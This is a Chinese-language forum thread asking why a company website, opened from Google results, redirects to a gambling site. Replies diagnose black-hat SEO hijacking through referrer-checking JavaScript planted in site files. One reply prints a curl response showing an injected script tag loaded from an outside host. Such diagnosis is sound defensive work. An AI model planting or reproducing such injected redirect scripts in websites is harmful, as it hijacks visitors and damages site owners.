V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
coolair
V2EX  ›  问与答

Google 搜出来的企业官网,点进去会跳到赌博网站,是什么原因?

  •  
  •   coolair · 2016-05-05 17:43:49 +08:00 · 2924 次点击
    这是一个创建于 3123 天前的主题,其中的信息可能已经有所发展或是发生改变。
    我在 Google 搜索“江西长运”,找到官网链接如下:

    点进去以后竟然跳转到了一个赌博网站(用手机浏览器点击却不会跳转到赌博网站):


    但是,直接在浏览器输入“江西长运”的网址,即 Google 搜索出来的网址 www.jxcy.com.cn 却没有问题。


    是我电脑中毒了?还是网站有问题?
    14 条回复    2016-05-06 22:40:30 +08:00
    aceseo
        1
    aceseo  
       2016-05-05 17:54:44 +08:00
    網站劫持,黑帽
    mozutaba
        2
    mozutaba  
       2016-05-05 17:57:10 +08:00
    黑帽
    coolair
        3
    coolair  
    OP
       2016-05-05 18:00:24 +08:00
    @aceseo
    @mozutaba 怎么劫持的?图 1 里面的介绍也是赌博网站的。
    fsdty
        4
    fsdty  
       2016-05-05 18:11:04 +08:00 via Android   ❤️ 1
    如果是百度出现了这个问题……
    JiShuTui
        5
    JiShuTui  
       2016-05-05 18:12:29 +08:00 via Android
    官网被挂马了
    yylzcom
        6
    yylzcom  
       2016-05-05 18:13:58 +08:00
    以前遇到过,被加入一段 js 代码,判断 referrer ,如果是 referrer 是 google bing 等搜索引擎,跳转,直接输入打开无问题
    当时朋友用的是 wordpress ,代码加在 wp-config.php 里,所以无论怎么升级替换文件都没用……
    alex321
        7
    alex321  
       2016-05-05 18:19:58 +08:00
    @yylzcom 对头。。
    各种官网很多都是托管在虚拟空间里面的,而且国内绝大多数机器环境直接就是 2003 跑着 asp ,还用些早已年久失修的代码。。。
    然后,自然是想被做什么东西就是可以被做什么东西的了。
    yexm0
        8
    yexm0  
       2016-05-05 18:38:39 +08:00   ❤️ 2
    支持的搜索引擎挺多的
    charmjoe
        9
    charmjoe  
       2016-05-05 18:55:13 +08:00
    我觉得没那么复杂,这个域名本身就是那个赌博网站的,你们搜索完了打开前看那个简介,介绍的就是赌博相关的
    kn007
        10
    kn007  
       2016-05-05 20:25:21 +08:00
    黑帽子戏法
    msg7086
        11
    msg7086  
       2016-05-05 21:18:46 +08:00
    $ curl --referer https://www.google.com/ http://www.jxcy.com.cn/

    <script language='javascript' src='http://www.lzsmjx.com/info/168.js'></script><br/>%
    msg7086
        12
    msg7086  
       2016-05-05 21:19:18 +08:00
    @charmjoe 那个介绍的就是被跳转以后的赌博网站。
    网站是被劫持的。
    triThirty
        13
    triThirty  
       2016-05-06 17:03:24 +08:00
    @msg7086 额。。。不太懂。这意思是这是在代码层实现的跳转?那就是写网站后台人自己怎么弄的?
    msg7086
        14
    msg7086  
       2016-05-06 22:40:30 +08:00
    @triThirty 多数是被人劫持了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2915 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 03:15 · PVG 11:15 · LAX 19:15 · JFK 22:15
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.